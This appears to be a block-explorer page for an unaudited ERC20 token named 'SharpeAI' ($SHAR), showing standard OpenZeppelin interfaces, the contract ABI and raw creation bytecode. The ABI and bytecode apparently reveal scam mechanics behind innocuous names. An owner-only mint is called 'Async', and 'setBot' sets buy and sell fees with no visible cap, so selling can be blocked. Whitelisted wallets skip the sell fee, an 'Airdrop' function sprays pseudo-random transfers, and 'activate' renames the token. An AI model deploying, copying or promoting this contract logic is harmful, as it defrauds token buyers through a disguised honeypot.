function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; }
// SPDX-License-Identifier: MIT // File @openzeppelin/contracts/token/ERC20/[email protected] // OpenZeppelin Contracts v4.4.0 (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer( address recipient, uint256 amount ) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance( address owner, address spender ) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval( address indexed owner, address indexed spender, uint256 value ); }
// SPDX-License-Identifier: MIT // File @openzeppelin/contracts/token/ERC20/[email protected] // OpenZeppelin Contracts v4.4.0 (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer( address recipient, uint256 amount ) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance( address owner, address spender ) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval( address indexed owner, address indexed spender, uint256 value ); } // File @openzeppelin/contracts/token/ERC20/extensions/[email protected] // OpenZeppelin Contracts v4.4.0 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.0 (utils/Context.sol) // ** // ** // ** pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File @openzeppelin/contracts/access/[email protected] // OpenZeppelin Contracts v4.4.0 (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require( _owner == _msgSender(), "Ownable: caller is not the owner" ); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require( newOwner != address(0), "Ownable: new owner is the zero address" ); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"Airdroptimes","type":"uint256"},{"internalType":"uint256","name":"numAddresses","type":"uint256"}],"name":"Airdrop","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Async","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"LIQUID_RATE","outputs":[{"internalType":"uint16","name":"","type":"uint16"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_PERCENTAGE","outputs":[{"internalType":"uint16","name":"","type":"uint16"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"string","name":"_uname","type":"string"},{"internalType":"string","name":"_usymbol","type":"string"}],"name":"activate","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initialized","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxRuleLimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"minRuleLimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"bool","name":"permission","type":"bool"}],"name":"setAirdrop","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_minRuleLimit","type":"uint256"},{"internalType":"uint256","name":"_maxRuleLimit","type":"uint256"}],"name":"setBot","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_uniswapV2Pair","type":"address"}],"name":"setPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]
Contract Creation Code
60e060405261001261035b60201b60201c565b600a61001e919061070a565b64e8d4a5100061002e9190610754565b6080908152505f60065f6101000a81548160ff02191690831515021790555061dead60075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505f60a0908152505f60c0908152505f6008555f6009553480156100b0575f80fd5b506040518060400160405280600881526020017f53686172706541490000000000000000000000000000000000000000000000008152506040518060400160405280600581526020017f245348415200000000000000000000000000000000000000000000000000000081525061013961012e61036360201b60201c565b61036a60201b60201c565b816004908161014891906109c6565b50806005908161015891906109c6565b50505061018d33606461ffff16606461ffff166080516101789190610754565b6101829190610ac2565b61042b60201b60201c565b600160065f6101000a81548160ff0219169083151502179055506001600a5f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001600a5f600660019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f73ffffffffffffffffffffffffffffffffffffffff1663c9c653963073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc26040518363ffffffff1660e01b81526004016102d6929190610b31565b6020604051808303815f875af11580156102f2573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906103169190610b86565b600660016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550610c84565b5f6012905090565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610499576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161049090610c0b565b60405180910390fd5b6104aa5f838361058f60201b60201c565b8060035f8282546104bb9190610c29565b925050819055508060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825461050e9190610c29565b925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516105729190610c6b565b60405180910390a361058b5f838361059460201b60201c565b5050565b505050565b505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111561061b578086048111156105f7576105f6610599565b5b60018516156106065780820291505b8081029050610614856105c6565b94506105db565b94509492505050565b5f8261063357600190506106ee565b81610640575f90506106ee565b816001811461065657600281146106605761068f565b60019150506106ee565b60ff84111561067257610671610599565b5b8360020a91508482111561068957610688610599565b5b506106ee565b5060208310610133831016604e8410600b84101617156106c45782820a9050838111156106bf576106be610599565b5b6106ee565b6106d184848460016105d2565b925090508184048111156106e8576106e7610599565b5b81810290505b9392505050565b5f819050919050565b5f60ff82169050919050565b5f610714826106f5565b915061071f836106fe565b925061074c7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484610624565b905092915050565b5f61075e826106f5565b9150610769836106f5565b9250828202610777816106f5565b9150828204841483151761078e5761078d610599565b5b5092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061081057607f821691505b602082108103610823576108226107cc565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026108857fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8261084a565b61088f868361084a565b95508019841693508086168417925050509392505050565b5f819050919050565b5f6108ca6108c56108c0846106f5565b6108a7565b6106f5565b9050919050565b5f819050919050565b6108e3836108b0565b6108f76108ef826108d1565b848454610856565b825550505050565b5f90565b61090b6108ff565b6109168184846108da565b505050565b5b818110156109395761092e5f82610903565b60018101905061091c565b5050565b601f82111561097e5761094f81610829565b6109588461083b565b81016020851015610967578190505b61097b6109738561083b565b83018261091b565b50505b505050565b5f82821c905092915050565b5f61099e5f1984600802610983565b1980831691505092915050565b5f6109b6838361098f565b9150826002028217905092915050565b6109cf82610795565b67ffffffffffffffff8111156109e8576109e761079f565b5b6109f282546107f9565b6109fd82828561093d565b5f60209050601f831160018114610a2e575f8415610a1c578287015190505b610a2685826109ab565b865550610a8d565b601f198416610a3c86610829565b5f5b82811015610a6357848901518255600182019150602085019450602081019050610a3e565b86831015610a805784890151610a7c601f89168261098f565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f610acc826106f5565b9150610ad7836106f5565b925082610ae757610ae6610a95565b5b828204905092915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610b1b82610af2565b9050919050565b610b2b81610b11565b82525050565b5f604082019050610b445f830185610b22565b610b516020830184610b22565b9392505050565b5f80fd5b610b6581610b11565b8114610b6f575f80fd5b50565b5f81519050610b8081610b5c565b92915050565b5f60208284031215610b9b57610b9a610b58565b5b5f610ba884828501610b72565b91505092915050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f610bf5601f83610bb1565b9150610c0082610bc1565b602082019050919050565b5f6020820190508181035f830152610c2281610be9565b9050919050565b5f610c33826106f5565b9150610c3e836106f5565b9250828201905080821115610c5657610c55610599565b5b92915050565b610c65816106f5565b82525050565b5f602082019050610c7e5f830184610c5c565b92915050565b60805160a05160c05161340d610cae5f395f6107a301525f61087601525f6110e1015261340d5ff3fe608060405234801561000f575f80fd5b50600436106101d8575f3560e01c806370a0823111610102578063a457c2d7116100a0578063d5abeb011161006f578063d5abeb0114610536578063dd62ed3e14610554578063e8442fe614610584578063f2fde38b146105a0576101d8565b8063a457c2d71461049e578063a9059cbb146104ce578063b715af76146104fe578063bf0058d01461051a576101d8565b80638187f516116100dc5780638187f516146104285780638da5cb5b1461044457806395d89b4114610462578063985bdfd114610480576101d8565b806370a08231146103d257806370f7cffc14610402578063715018a61461041e576101d8565b80632b14ca561161017a57806349bd5a5e1161014957806349bd5a5e1461035c5780634c255c971461037a5780634e148e191461039857806358a1aaae146103b4576101d8565b80632b14ca56146102d2578063313ce567146102f0578063395093511461030e578063470624021461033e576101d8565b806318160ddd116101b657806318160ddd1461024857806321326f091461026657806323b872dd1461028457806327c8f835146102b4576101d8565b806306fdde03146101dc578063095ea7b3146101fa578063158ef93e1461022a575b5f80fd5b6101e46105bc565b6040516101f19190611ff1565b60405180910390f35b610214600480360381019061020f91906120af565b61064c565b6040516102219190612107565b60405180910390f35b610232610669565b60405161023f9190612107565b60405180910390f35b61025061067b565b60405161025d919061212f565b60405180910390f35b61026e610684565b60405161027b919061212f565b60405180910390f35b61029e60048036038101906102999190612148565b61068a565b6040516102ab9190612107565b60405180910390f35b6102bc61077c565b6040516102c991906121a7565b60405180910390f35b6102da6107a1565b6040516102e7919061212f565b60405180910390f35b6102f86107c5565b60405161030591906121db565b60405180910390f35b610328600480360381019061032391906120af565b6107cd565b6040516103359190612107565b60405180910390f35b610346610874565b604051610353919061212f565b60405180910390f35b610364610898565b60405161037191906121a7565b60405180910390f35b6103826108be565b60405161038f9190612210565b60405180910390f35b6103b260048036038101906103ad9190612253565b6108c3565b005b6103bc6109af565b6040516103c9919061212f565b60405180910390f35b6103ec60048036038101906103e79190612291565b6109b5565b6040516103f9919061212f565b60405180910390f35b61041c600480360381019061041791906122bc565b6109fb565b005b610426610bdd565b005b610442600480360381019061043d9190612291565b610c7c565b005b61044c610dc2565b60405161045991906121a7565b60405180910390f35b61046a610de9565b6040516104779190611ff1565b60405180910390f35b610488610e79565b6040516104959190612210565b60405180910390f35b6104b860048036038101906104b391906120af565b610e7e565b6040516104c59190612107565b60405180910390f35b6104e860048036038101906104e391906120af565b610f64565b6040516104f59190612107565b60405180910390f35b610518600480360381019061051391906122bc565b610f81565b005b610534600480360381019061052f9190612426565b611027565b005b61053e6110df565b60405161054b919061212f565b60405180910390f35b61056e6004803603810190610569919061249c565b611103565b60405161057b919061212f565b60405180910390f35b61059e600480360381019061059991906120af565b611185565b005b6105ba60048036038101906105b59190612291565b6112fa565b005b6060600480546105cb90612507565b80601f01602080910402602001604051908101604052809291908181526020018280546105f790612507565b80156106425780601f1061061957610100808354040283529160200191610642565b820191905f5260205f20905b81548152906001019060200180831161062557829003601f168201915b5050505050905090565b5f61065f610658611408565b848461140f565b6001905092915050565b60065f9054906101000a900460ff1681565b5f600354905090565b60095481565b5f6106968484846115d2565b5f60025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6106dd611408565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508281101561075c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610753906125a7565b60405180910390fd5b61077085610768611408565b85840361140f565b60019150509392505050565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b7f000000000000000000000000000000000000000000000000000000000000000081565b5f6012905090565b5f61086a6107d9611408565b848460025f6107e6611408565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461086591906125f2565b61140f565b6001905092915050565b7f000000000000000000000000000000000000000000000000000000000000000081565b600660019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606481565b6108cb611408565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610957576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161094e9061266f565b60405180910390fd5b80600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b60085481565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610a03611408565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a8f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a869061266f565b60405180910390fd5b5f8211610ad1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ac8906126fd565b60405180910390fd5b5f8111610b13576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0a9061278b565b60405180910390fd5b5f4290505f610b2282846119b7565b90505f5b8151811015610bd6575f5b85811015610bc8575f620f424062895440610b61878587610b5291906125f2565b610b5c91906125f2565b611ab1565b610b6b91906127d6565b610b7591906125f2565b9050610bba33858581518110610b8e57610b8d612806565b5b6020026020010151610b9e6107c5565b600a610baa9190612962565b84610bb591906129ac565b6115d2565b508080600101915050610b31565b508080600101915050610b26565b5050505050565b610be5611408565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610c71576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c689061266f565b60405180910390fd5b610c7a5f611ae6565b565b610c84611408565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610d10576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d079061266f565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d7e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7590612a5d565b60405180910390fd5b80600660016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060058054610df890612507565b80601f0160208091040260200160405190810160405280929190818152602001828054610e2490612507565b8015610e6f5780601f10610e4657610100808354040283529160200191610e6f565b820191905f5260205f20905b815481529060010190602001808311610e5257829003601f168201915b5050505050905090565b606481565b5f8060025f610e8b611408565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610f45576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f3c90612aeb565b60405180910390fd5b610f59610f50611408565b8585840361140f565b600191505092915050565b5f610f77610f70611408565b84846115d2565b6001905092915050565b610f89611408565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611015576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100c9061266f565b60405180910390fd5b81600881905550806009819055505050565b61102f611408565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146110bb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110b29061266f565b60405180910390fd5b81600490816110ca9190612ca6565b5080600590816110da9190612ca6565b505050565b7f000000000000000000000000000000000000000000000000000000000000000081565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b61118d611408565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611219576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112109061266f565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611287576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161127e90612dbf565b60405180910390fd5b5f81116112c9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112c090612e27565b60405180910390fd5b5f6112d26107c5565b600a6112de9190612962565b826112e991906129ac565b90506112f58382611ba7565b505050565b611302611408565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461138e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113859061266f565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036113fc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113f390612eb5565b60405180910390fd5b61140581611ae6565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361147d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161147490612f43565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036114eb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114e290612fd1565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516115c5919061212f565b60405180910390a3505050565b6001151560065f9054906101000a900460ff16151514611627576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161161e90613039565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff16600660019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614801561169657506001151560065f9054906101000a900460ff161515145b1561174e576116a3610dc2565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16148061170e57506116df610dc2565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b61174d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611744906130a1565b60405180910390fd5b5b5f8190505f73ffffffffffffffffffffffffffffffffffffffff16600660019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16141580156117e357506117b3610dc2565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b801561182257506117f2610dc2565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b156119a6575f600660019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1603611887576008549050611941565b600660019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036119405760011515600a5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16151503611939575f905061193f565b60095490505b5b5b5f8111156119a4575f606461ffff16828561195c91906129ac565b61196691906130bf565b9050808461197491906130ef565b92506119a28660075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1683611cff565b505b505b6119b1848483611cff565b50505050565b60605f8267ffff